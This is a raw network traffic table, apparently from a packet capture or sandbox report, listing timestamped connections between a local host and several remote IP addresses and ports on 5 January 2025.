                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.507862091 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.507867098 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.686314106 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.686326981 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.686388016 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.686395884 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.686448097 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.686621904 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.686638117 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.686687946 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.686692953 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.686733007 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.687460899 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.687483072 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.687525988 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.687531948 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.687582970 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.688183069 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.688196898 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.688266039 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.688272953 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.688313961 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.688466072 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.688478947 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.688529968 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.688642025 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.688642025 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.688649893 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.689435959 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.689452887 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.689493895 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.689502001 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.689543009 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.773971081 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.773988008 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.774044037 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.774055004 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.774107933 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.774488926 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.774504900 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.774553061 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.774559021 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.774585009 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.774964094 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.774983883 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.775038004 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.775043011 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.775610924 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.775625944 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.775690079 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.775697947 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.776164055 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.776182890 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.776226044 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.776233912 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.776261091 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.776546001 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.776604891 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.776612043 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.776643991 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.776696920 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.776849985 CET49872443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.776858091 CET4434987223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:28.254019022 CET49903443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:28.254031897 CET4434990323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:28.254198074 CET49903443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:28.254551888 CET49903443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:28.254561901 CET4434990323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:28.708045959 CET4434990323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:28.708312035 CET49903443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:28.708323956 CET4434990323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:28.709291935 CET4434990323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:28.709433079 CET49903443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:28.709758043 CET49903443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.157639980 CET4434992952.182.143.209192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.167869091 CET497117346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.172934055 CET734649711195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.173247099 CET497117346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268661022 CET49928443192.168.2.652.182.143.209
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268718958 CET49929443192.168.2.652.182.143.209
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268783092 CET49903443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268831015 CET4434990323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268865108 CET49882443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268902063 CET49903443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268918037 CET4434988223.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.268965960 CET49882443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.311345100 CET4434992952.182.143.209192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.315324068 CET4434992852.182.143.209192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.840475082 CET4434992952.182.143.209192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.840583086 CET4434992952.182.143.209192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.840615034 CET49929443192.168.2.652.182.143.209
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:31.840724945 CET49929443192.168.2.652.182.143.209
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:32.021576881 CET4434992852.182.143.209192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:32.021645069 CET49928443192.168.2.652.182.143.209
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:33.691534042 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:33.692945004 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:33.697776079 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.209378004 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.209400892 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.209692955 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.210402966 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.210416079 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.992122889 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.992188931 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.995003939 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.995007992 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.995208025 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.997626066 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.997776985 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.997781992 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:44.998065948 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:45.043319941 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:45.175399065 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:45.175623894 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:45.175704002 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:45.224436045 CET50011443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:45.224450111 CET4435001140.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:03.709636927 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:03.711074114 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:03.715913057 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.046772957 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.046813011 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.046886921 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.047480106 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.047494888 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.844692945 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.844800949 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.846646070 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.846656084 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.846995115 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.848747015 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.848805904 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.848809958 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.848926067 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:09.891339064 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:10.023135900 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:10.023257017 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:10.023317099 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:10.023658037 CET50069443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:10.023675919 CET4435006940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:14.185838938 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:14.497963905 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:15.107368946 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:16.310467958 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:18.716705084 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:40:23.529225111 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.199836969 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.201719999 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.201781034 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.201786995 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.201916933 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.243334055 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.376821995 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.377005100 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.377549887 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.378082037 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.378103971 CET4435007340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:42:37.378115892 CET50073443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:43:03.776518106 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:43:03.777743101 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:43:03.782552004 CET734649709195.133.78.18192.168.2.6
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.098828077 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.098843098 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.098850965 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.098860025 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.099412918 CET64317443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.099592924 CET64317443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.100735903 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.101598978 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.101954937 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.102293015 CET64317443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.194895029 CET44364317172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.237807989 CET64317443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.527592897 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.527813911 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.553567886 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.553781033 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.554387093 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.554522038 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.554598093 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.554706097 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.562931061 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.563129902 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.624106884 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.636297941 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.637463093 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.640479088 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.649878025 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.650955915 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.651396990 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.651523113 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.651734114 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.651897907 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.652116060 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.652395010 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.652475119 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.652935982 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.653032064 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.655085087 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.655216932 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.655846119 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.656121969 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.656325102 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.656380892 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.659749031 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.660638094 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.660805941 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.660990000 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.751542091 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.752521038 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.753108025 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.753118992 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.753129005 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.753160954 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.753433943 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.753537893 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.753659010 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.753901005 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.755465984 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.759603977 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.759906054 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.813519955 CET61268443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.815107107 CET61268443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.815260887 CET61268443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.815344095 CET61268443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.855770111 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.856393099 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.856822968 CET44362859162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:25.856992006 CET62859443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:26.171468973 CET61268443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:26.257514954 CET44361268162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:26.258435965 CET61268443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:26.266032934 CET44361268162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.315814972 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.317964077 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.321337938 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.323483944 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.326231956 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.328572989 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.334218979 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.334811926 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.334825993 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.334837914 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.334980011 CET4435612323.209.72.7192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.344248056 CET56123443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.344979048 CET56123443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.345096111 CET56123443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.345221043 CET56123443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.345282078 CET56123443192.168.2.623.209.72.7
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:27.345386028 CET56123443192.168.2.623.209.72.7
